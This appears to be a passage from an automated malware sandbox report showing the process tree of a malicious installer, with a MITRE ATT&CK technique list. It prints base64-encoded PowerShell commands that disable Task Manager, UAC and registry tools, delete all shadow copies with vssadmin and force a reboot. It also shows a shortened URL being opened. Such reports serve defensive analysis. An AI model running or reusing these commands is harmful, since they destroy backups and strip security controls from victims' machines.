      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAiACAALQBOAGEAbQBlACAAIgBFAHgAcABsAG8AcgBlAHIAIgAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AQwBlAG4AdABlAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBDAGUAbgB0AGUAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBUAGEAcwBrAE0AZwByACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAIgBEAFcAbwByAGQAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBUAGEAcwBrAE0AZwByACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAEwAVQBBACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBFAG4AYQBiAGwAZQBMAFUAQQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwAiACAALQBOAGEAbQBlACAAIgBTAHkAcwB0AGUAbQAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFIAZQBnAGkAcwB0AHIAeQBUAG8AbwBsAHMAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFIAZQBnAGkAcwB0AHIAeQBUAG8AbwBsAHMAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBSAGUAZwBpAHMAdAByAHkAVABvAG8AbABzACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAIgBEAFcAbwByAGQAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBSAGUAZwBpAHMAdAByAHkAVABvAG8AbABzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQA=
      4⤵
      PID:2992
    - - C:\Windows\SysWOW64\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:3660
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssA547.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiA544.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrA545.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrA546.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:4208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgB2AHMAcwBhAGQAbQBpAG4AIABkAGUAbABlAHQAZQAgAHMAaABhAGQAbwB3AHMAIAAvAGEAbABsACAALwBxAHUAaQBlAHQACgBUAGkAbQBlAG8AdQB0ACAALwBUACAANgAwAAoAUgBlAHMAdABhAHIAdAAtAEMAbwBtAHAAdQB0AGUAcgAgAC0ARgBvAHIAYwBlAA==
      4⤵
      PID:5880
    - - C:\Windows\system32\vssadmin.exe
        
        "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4896
    - - C:\Windows\system32\timeout.exe
        
        "C:\Windows\system32\timeout.exe" /T 60
        5⤵
        Delays execution with timeout.exe
        
        PID:5876
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:5660
- C:\Windows\Installer\MSI4CEE.tmp
  "C:\Windows\Installer\MSI4CEE.tmp" https://rebrand.ly/7553b0
  2⤵
  PID:4200
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rebrand.ly/7553b0
    3⤵
    PID:1116
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
      4⤵
      PID:1600
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
      4⤵
      PID:4404
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
      4⤵
      PID:1340
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
      4⤵
      PID:212
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
      4⤵
      PID:4800
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
      4⤵
      PID:4040
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
      4⤵
      PID:5376
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
      4⤵
      PID:5400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
      4⤵
      PID:5840
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
      4⤵
      PID:5832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
      4⤵
      PID:6084
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
      4⤵
      PID:6076
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2733643149780779802,8909577587746294650,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5056 /prefetch:2
      4⤵
      PID:3112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8278646f8,0x7ff827864708,0x7ff827864718
1⤵
PID:4020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3588

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1536

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact